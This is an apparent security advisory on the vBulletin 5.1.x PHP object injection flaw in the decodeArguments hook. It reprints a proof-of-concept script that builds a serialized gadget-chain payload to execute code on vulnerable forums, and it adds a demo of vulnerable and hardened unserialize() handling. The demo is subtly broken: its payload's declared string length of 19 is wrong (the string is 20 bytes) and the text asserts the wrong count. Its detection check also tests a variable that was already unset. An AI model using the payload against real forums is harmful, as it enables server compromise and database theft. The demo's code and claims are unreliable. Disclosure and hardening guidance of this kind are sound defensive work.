On 03 Nov 2015 vBulletin released security patches. vBulletin 5.1.4 through 5.1.9 is vulnerable to PHP object injection, which lets an attacker take control of the website and dump the forum's database.
The vulnerability has been disclosed publicly, it is serious, and it is easy to exploit to compromise the vBulletin forum server. The vBulletin main forum itself was defaced on Monday using this vulnerability.
We recommend that all vBulletin users apply the patch for the PHP object injection vulnerability and harden their vBulletin server setup.
The vulnerable component is the decodeArguments Ajax API hook. It passes attacker-supplied data to PHP's unserialize(), so an attacker only needs to craft a serialized PHP object whose properties steer an existing class (a "gadget") into running a chosen function when the object is used or destroyed.
The following script was released to construct the serialized object. It declares stand-in classes with the same names and property layout as the real vBulletin classes, so that serialize() produces a payload the forum's own vB_dB_Result and vB_Database classes will accept; the 'free_result' entry is the callable that ends up being invoked, here phpinfo() as a harmless proof of code execution:

```php
<?php
// Stand-in for vBulletin's vB_Database: only the property that matters
// for the gadget chain is reproduced.
class vB_Database {
    public $functions = array();
    public function __construct() {
        // The callable vBulletin will invoke; phpinfo() proves execution
        $this->functions['free_result'] = 'phpinfo';
    }
}

// Stand-in for vBulletin's vB_dB_Result, which holds a reference to the
// database object and a recordset handle.
class vB_dB_Result {
    protected $db;
    protected $recordset;
    public function __construct() {
        $this->db = new vB_Database();
        $this->recordset = 1;
    }
}

// Emit the serialized, URL-encoded payload to send to decodeArguments.
print urlencode(serialize(new vB_dB_Result())) . "\n";
```
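To show what the decodeArguments flaw boils down to, and what the hardening recommended above looks like in code, here is an added, self-contained example. It is not vBulletin's code and not the released PoC: the LogWriter class, its properties and the three decode_* functions are hypothetical stand-ins. Only the mechanism is the real one: unserialize() on untrusted input instantiates whatever class the payload names, and that class's destructor calls an attacker-chosen callable.

```php
<?php
// Added example (not vBulletin code): minimal PHP object injection gadget
// beside the two fixes that neutralise it. Requires PHP >= 7.3.

// Hypothetical gadget class. Any application class with a magic method
// (__destruct, __wakeup, __toString, ...) that acts on its own properties
// can play this role; unserialize() lets the attacker set those properties.
class LogWriter {
    public $callback;   // attacker-controlled after unserialize()
    public $arg;
    public function __destruct() {
        // Whatever callable is stored in $callback runs when the object dies.
        if (is_callable($this->callback)) {
            call_user_func($this->callback, $this->arg);
        }
    }
}

// Vulnerable pattern: untrusted bytes go straight into unserialize().
function decode_vulnerable(string $untrusted) {
    return unserialize($untrusted);
}

// Hardened: refuse to instantiate any class. Objects in the payload become
// __PHP_Incomplete_Class, so no magic method of the real class ever runs.
function decode_hardened(string $untrusted) {
    return unserialize($untrusted, ['allowed_classes' => false]);
}

// Hardened further: do not use the serialize format for untrusted data at all.
// JSON carries only scalars, arrays and plain maps, never class names.
function decode_json(string $untrusted): array {
    return json_decode($untrusted, true, 32, JSON_THROW_ON_ERROR);
}

// Constructed attacker payload, written by hand so that no real object is
// created on the sending side. It names the gadget class and points the
// callback at printf so the effect is visible but harmless.
$payload = 'O:9:"LogWriter":2:{s:8:"callback";s:6:"printf";'
         . 's:3:"arg";s:19:"gadget chain fired\n";}';

echo "vulnerable decode: ";
$obj = decode_vulnerable($payload);
echo get_class($obj), "\n";          // LogWriter
unset($obj);                         // __destruct runs: prints "gadget chain fired"

echo "hardened decode: ";
$obj = decode_hardened($payload);
echo get_class($obj), "\n";          // __PHP_Incomplete_Class
unset($obj);                         // nothing runs

// A decoded __PHP_Incomplete_Class is itself a signal worth logging: a
// legitimate client never sends objects, so its presence means an attempt.
if ($obj instanceof __PHP_Incomplete_Class) {
    error_log('object injection attempt blocked');
}

echo "json decode: ";
var_export(decode_json('{"callback":"printf","arg":"x"}'));
echo "\n";                           // a plain array, no object, no callback
```

Note that the string length in the payload counts the literal backslash and "n" inside single quotes (19 bytes), which is exactly why hand-built payloads are fragile and real attackers generate them with serialize() as the released script does. The allowed_classes option is the quick fix when the serialize format cannot be abandoned; switching the endpoint to JSON removes the class of bug entirely.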
More technical details about the vulnerability can be found here.